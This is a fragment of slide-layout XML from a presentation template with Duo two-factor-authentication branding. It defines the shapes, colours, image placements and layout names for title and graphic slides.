          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="4878650"/>
            <a:ext cx="88500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809" name="Google Shape;809;p122"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102900" y="4430250"/>
            <a:ext cx="1284725" cy="2320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A6 - Title (green graphics 1)">
  <p:cSld name="CUSTOM_7_3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 810"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="811" name="Google Shape;811;p123"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812" name="Google Shape;812;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670275" y="3177625"/>
            <a:ext cx="2368200" cy="236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3" name="Google Shape;813;p123"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3821850" y="2028800"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Google Shape;814;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5141600" y="-12"/>
            <a:ext cx="9371125" cy="19386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123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="149150" y="-332675"/>
            <a:ext cx="2884114" cy="567900"/>
            <a:chOff x="-162300" y="-235325"/>
            <a:chExt cx="2884114" cy="567900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="816" name="Google Shape;816;p123"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-16230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23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60978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23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1381859"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23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2153914"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123"/>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123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481450" y="4878650"/>
            <a:ext cx="16626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822" name="Google Shape;822;p123"/>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A7 - Title (green graphics 2)">
  <p:cSld name="CUSTOM_7_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 823"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="824" name="Google Shape;824;p124"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825" name="Google Shape;825;p124"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="898725" y="-1829275"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="769718"/>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24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="-396224"/>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24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="3097511"/>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24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="1931569"/>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24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7724775" y="288450"/>
            <a:ext cx="1627800" cy="1627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 name="Google Shape;831;p124"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="-1022" t="-2412" r="63447" b="85969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556250" y="4651325"/>
            <a:ext cx="2587753" cy="532724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="Google Shape;832;p124"/>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124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855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834" name="Google Shape;834;p124"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">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8 - Title (green graphics 3)">
  <p:cSld name="CUSTOM_7_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 835"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="836" name="Google Shape;836;p12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837" name="Google Shape;837;p125"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4990775" y="-1821175"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Google Shape;838;p125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7298825" y="1116025"/>
            <a:ext cx="2309700" cy="2309700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="3432313" y="5942038"/>
            <a:ext cx="8600475" cy="17792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25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135875" y="-227205"/>
            <a:ext cx="981600" cy="9816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25"/>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125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855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843" name="Google Shape;843;p125"/>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A9 - Title (green graphics 4)">
  <p:cSld name="CUSTOM_7_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 844"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="845" name="Google Shape;845;p12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846" name="Google Shape;846;p126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6059475" y="-1023400"/>
            <a:ext cx="3363900" cy="33639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7" name="Google Shape;847;p126"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1242350" y="-2194400"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848" name="Google Shape;848;p126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564375" y="475025"/>
            <a:ext cx="1627800" cy="1627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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231250" y="4333495"/>
            <a:ext cx="981600" cy="981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0" name="Google Shape;850;p126"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="-1022" t="-2412" r="63447" b="85969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556250" y="4651325"/>
            <a:ext cx="2587753" cy="532724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851;p126"/>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2" name="Google Shape;852;p126"/>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D5 - Graphics (navy abstract 1)">
  <p:cSld name="CUSTOM_10">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 853"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854" name="Google Shape;854;p127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-285900" y="3935250"/>
            <a:ext cx="2894400" cy="28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5" name="Google Shape;855;p127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1754275" y="-1101375"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Google Shape;856;p127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3252152" y="1251900"/>
            <a:ext cx="2639700" cy="26397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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4118024" y="7221036"/>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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6212462" y="-525152"/>
            <a:ext cx="1240800" cy="12408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9" name="Google Shape;859;p127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4686150" y="2580775"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="860" name="Google Shape;860;p127"/>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861" name="Google Shape;861;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233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862" name="Google Shape;862;p127"/>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D6 - Graphics (Navy abstract 2)">
  <p:cSld name="CUSTOM_10_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 863"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="864" name="Google Shape;864;p128"/>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865" name="Google Shape;865;p128"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-721262" y="3665250"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="866" name="Google Shape;866;p128"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3346438" y="-774425"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Google Shape;867;p128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-573750" y="-1070300"/>
            <a:ext cx="3747000" cy="3747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28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524225" y="3541155"/>
            <a:ext cx="1031100" cy="10311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28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6966991" y="2676700"/>
            <a:ext cx="1693500" cy="16935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2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871" name="Google Shape;871;p128"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8050375" y="4700875"/>
            <a:ext cx="984229" cy="1777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D7 - Graphics (navy abstract 3)">
  <p:cSld name="CUSTOM_10_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 872"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="873" name="Google Shape;873;p129"/>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874" name="Google Shape;874;p129"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2108500" y="2549375"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="875" name="Google Shape;875;p129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612050" y="-449600"/>
            <a:ext cx="3423000" cy="3423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29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4548725" y="-2572112"/>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29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-201700" y="1329517"/>
            <a:ext cx="1906500" cy="19065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2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879" name="Google Shape;879;p129"/>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D8 - Graphics (navy abstract 4)">
  <p:cSld name="CUSTOM_10_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 880"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="881" name="Google Shape;881;p130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-285900" y="3935250"/>
            <a:ext cx="2894400" cy="28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2" name="Google Shape;882;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5201438" y="-429925"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="883" name="Google Shape;883;p130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4667386" y="2840086"/>
            <a:ext cx="3330300" cy="33303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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4146412" y="1814888"/>
            <a:ext cx="1743300" cy="17433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5" name="Google Shape;885;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-2674687" y="469675"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Google Shape;886;p130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-3792426" y="-3359276"/>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887" name="Google Shape;887;p130"/>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888" name="Google Shape;888;p130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7911425" y="4878650"/>
            <a:ext cx="123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889" name="Google Shape;889;p130"/>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slide 1">
  <p:cSld name="TITLE_2_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 890"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="891" name="Google Shape;891;p131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="52" r="25515" b="23377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-40000" y="-40700"/>
            <a:ext cx="9281976" cy="5373599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="797050"/>
            <a:ext cx="5039700" cy="2442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93" name="Google Shape;893;p131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="3239050"/>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3F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F4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94" name="Google Shape;894;p1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pic>
        <p:nvPicPr>
          <p:cNvPr id="895" name="Google Shape;895;p131" descr="Duo Logo White@2x.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="384681" y="4327931"/>
            <a:ext cx="1513500" cy="490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1 - Graphic only (2FA)">
  <p:cSld name="SECTION_HEADER_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 74"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Google Shape;75;p14" descr="kendra-iphone-macbook.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="7827" b="7827"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144001" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Google Shape;76;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="4700872"/>
            <a:ext cx="548700" cy="177778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p14"/>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78" name="Google Shape;78;p1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9" name="Google Shape;79;p14"/>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3 - Body with image (Duo Mobile)">
  <p:cSld name="SECTION_HEADER_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 80"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Google Shape;81;p15"/>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82" name="Google Shape;82;p15"/>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83" name="Google Shape;83;p15" descr="Product Shot - iPhone.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
